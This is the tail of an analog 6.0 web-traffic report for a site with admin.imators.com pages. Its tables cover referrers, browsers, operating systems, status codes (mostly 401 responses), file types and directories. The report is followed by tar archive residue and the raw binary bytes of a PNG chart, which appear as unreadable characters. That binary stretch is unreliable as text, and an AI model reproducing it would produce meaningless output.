class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">13</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">14</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">17</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">18</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">19</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">20</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">22</td><td class="R">27</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">23</td><td class="R">20</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">23.31%</td><td class="xl">109</td></tr> <tr><td class="R">10</td><td class="b"> 1.47%</td><td class="xl">194.87</td></tr> <tr><td class="R">10</td><td class="b">16.57%</td><td class="xl">81.245</td></tr> <tr><td class="R">5</td><td class="b"> 1.00%</td><td class="xl">18</td></tr> <tr><td class="R">5</td><td class="b"> 1.00%</td><td class="xl">23</td></tr> <tr><td class="R">4</td><td class="b"> 0.80%</td><td class="xl">13</td></tr> <tr><td class="R">4</td><td class="b"> 4.68%</td><td class="xl">57</td></tr> <tr><td class="R">3</td><td class="b"> 0.60%</td><td class="xl">16</td></tr> <tr><td class="R">3</td><td class="b"> 8.51%</td><td class="xl">165.227</td></tr> <tr><td class="R">3</td><td class="b"> 3.82%</td><td class="xl">213.74</td></tr> <tr><td class="R">3</td><td class="b"> 8.52%</td><td class="xl">64.226</td></tr> <tr><td class="R">2</td><td class="b"> 0.40%</td><td class="xl">54</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">142.93</td></tr> <tr><td class="R">2</td><td class="b"> 0.40%</td><td class="xl">3</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">172.225</td></tr> <tr><td class="R">1</td><td class="b"> 0.20%</td><td class="xl">52</td></tr> <tr><td class="R">1</td><td class="b"> 0.20%</td><td class="xl">35</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">37</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">104</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">140.248</td></tr> <tr><td class="R">2</td><td class="b"> 1.97%</td><td class="xl">[not listed: 2 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./redirref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">3</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">53</td><td class="xl"><a href="http://www.admin.imators.com/">http://www.admin.imators.com/</a></td></tr> <tr><td class="R">27</td><td class="xl"><a href="https://www.admin.imators.com/">https://www.admin.imators.com/</a></td></tr> <tr><td class="R">24</td><td class="xl"><a href="http://admin.imators.com/">http://admin.imators.com/</a></td></tr> <tr><td class="R">18</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/dashboard.php">https://admin.imators.com/dashboard.php</a></td></tr> <tr><td class="R">4</td><td class="xl"><a href="https://www.admin.imators.com/autant">https://www.admin.imators.com/autant</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="http://admin.imators.com/gemance.html">http://admin.imators.com/gemance.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/invoice.php">https://admin.imators.com/invoice.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/leee-articles-school/process.html">https://admin.imators.com/leee-articles-school/process.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://103.26.142.189:2082/">http://103.26.142.189:2082/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://54.206.37.203:123/">https://54.206.37.203:123/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://timetool.adscads.com/">https://timetool.adscads.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/mail.php">https://admin.imators.com/mail.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/status.php">https://admin.imators.com/status.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://34.102.195.246/">https://34.102.195.246/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/editor.php">https://admin.imators.com/editor.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://a.sinsafinejewelry.online/">https://a.sinsafinejewelry.online/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://mdys.mdf031.icu/">https://mdys.mdf031.icu/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">24</td><td class="xl">https://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.admin.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">6</td><td class="P">5</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">10</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15</td></tr> <tr><td class="R">36</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">42</td><td class="P">17</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">34</td><td class="P">10</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">5</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N"> </td><td class="R">34</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">30</td><td class="P">8</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">30</td><td class="P">8</td><td class="xl"> Windows NT</td></tr> <tr><td class="N">2</td><td class="R">10</td><td class="P">7</td><td class="xl">Macintosh</td></tr> <tr><td class="N">3</td><td class="R">40</td><td class="P">6</td><td class="xl">OS unknown</td></tr> <tr><td class="N">4</td><td class="R">2</td><td class="P">2</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Linux</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">84</td><td class="xl">200 OK</td></tr> <tr><td class="R">6</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">1315</td><td class="xl">401 Authentication required</td></tr> <tr><td class="R">77</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">50</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">3</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">1</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">35</td><td class="b"> 6.38%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">40</td><td class="b">52.53%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">8</td><td class="b">41.09%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">38.80%</td><td class="xl">[directories]</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">17</td><td class="b">18.30%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">5</td><td class="b"> 6.41%</td><td class="xl">.html [Hypertext Markup Language]</td></tr> <tr><td class="R">34</td><td class="b"> 6.27%</td><td class="xl">[no extension]</td></tr> <tr><td class="R">2</td><td class="b"> 5.65%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">1</td><td class="b"> 2.69%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">3</td><td class="b"> 2.42%</td><td class="xl">.svg</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">37</td><td class="b">57.52%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">6</td><td class="b">10.76%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">34</td><td class="b"> 6.27%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">5</td><td class="b"> 6.00%</td><td class="xl">/leee-articles-school/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">100%</td><td class="D">Feb/13/25 10:03 PM</td><td class="xl">[not listed: 33 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> dir.png 0000644 00000005610 15114762035 0006036 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx���Kr�6`��'ck;s���@\�$��3�������� �xt�����5�hJ�>��"LI��O 0?؏�7�<yb?�� gɏ��' -`�����w�%NX�"��a!BX�"��a!BX�"��a!BX�"��a!BX�"�f��|V`q2�-k0�XR�>u�{3���b�Ē�s̈��������������0�z��cI�*���X\~~f�T-����Zb���Z�8,��q`�v��QX���5p������;�˾��j���c%±T "�z�D0�� �V ��J�b�4V� �X���C ���M+�j[z���?�G��?�� mk�⑵�[y�������m9X�O��.�7�}�l6˳Ba��V +�py�A�`ɏj�r��T�5|��.�����o�bq�*lZy�b�������5�h�eV�m�#KsXBM�� ¬�(VP��:,a �e�f,�(VX�h�B!���&9Xv���Q���X�Bt��>�������U5��|��������)a-;k�ɚC�+bE:��ɚV�æ��e�&�XX�̚��˯CV'C�p��T���m�,VlWX���C+E�ʸ�a%:Vд@X�b+ܜ3`%�� +Y�V����V��2�5\���l�a���U�5- V�k9X�0�9,i��a�6�d���+5�f�i��p}�ɘx�X����!+1��X�uCEXSf,#ť����N`5�4V� ��u�a��;W5]>Vv`�M�Z�3x��7��u�Z�\��B�X�*t��u�����ת�:�DM�a�Ia=�������:}&����\!Vaņ��A��@�H+v�*�g<4X�1��֭+V�q,�-hK��l۪-�9�Et���ʴ��NXfK�[��,s�s��C�y�J��*�H:Xc�M�by'g�ë���n[�c�qå�e��la`��m��`,s�Q�X��I����Mk�2�h�=�RextƱ�]�Tۺ�`-�V��O�l<��L�'�J��ͱ�>wt��\��W��B��:��4+Q�7�bK�D!��s��P�u�iV�m� +R���U�֡����W�m[����)aOY�#G&+ֶvIJ/@i+Ҳ�m� +lZ�{��:���l[�=��9Y��7T�;G���Z������A�W7����)-y���X�m[���i�Xv�F��+�"G>!��֢m�ef��@Mc��0Ҷ���:����A�z��u�SZVض�[c�9��4\i ��9?~J���m�T�>Bb�mk�3�巭�ű2;�e۪�:��k[w�*䅰�E,�mm����}샮�+��öu���;��%x��/�+�o��r���X������ »�&�ܶ6�J�'3�?n�Ú��}s,�XǼ[��'j�I.�[�vI�XS��K�/9���9,S��H��;��h����/�[��;��� a��=W��X���u�λ�G�X�5��Xb�˲�.�`�Io'�qC��c|�3�`~2�i�z�!g5�}�p�k��c�X�[�5x3�5��V�X�mm��~V`��u[�u���2m�������P�w�a!��! ��ׅ�`34� �9�Y��Ϭ�����뎬$V@4�7�*ߣ�LDX�:�h �eu��p",,� ����Z���EX�EX~�bU�,º$��?�Ygh�bմ,�"�rj�������^jg���e�5�PM�Z;ÕX�� a!� ��eu���^lgHX�D^�kY�����������u�EX����jY�u],p����0�F�0�˵,��Y�u������a���'>J��0�B$��N�:��_vT걮ײ����u����к`�",LR����ɫ0���šu�3om�V��X�I��Ъ�:��",L�X�:����$� C�����0Ice��J������� ��,��$��������Vnh�:XY��к�{f�y�|���%9,&7��b`屒]ݲz�X%�T!b��X��I+Q���G���C��Ů���;D$V'EXƊ"�euR� �X!ⰺX���c�"]ײ�X �e��auӱ@X�BDUa?E�Z"��"�a����z��X��´���`X~�B`��k[p��c�mܲ�jX��-0VoV`,�mA�:kX�5�-h��a1�mĒ�! �V"� ��A��2���KW"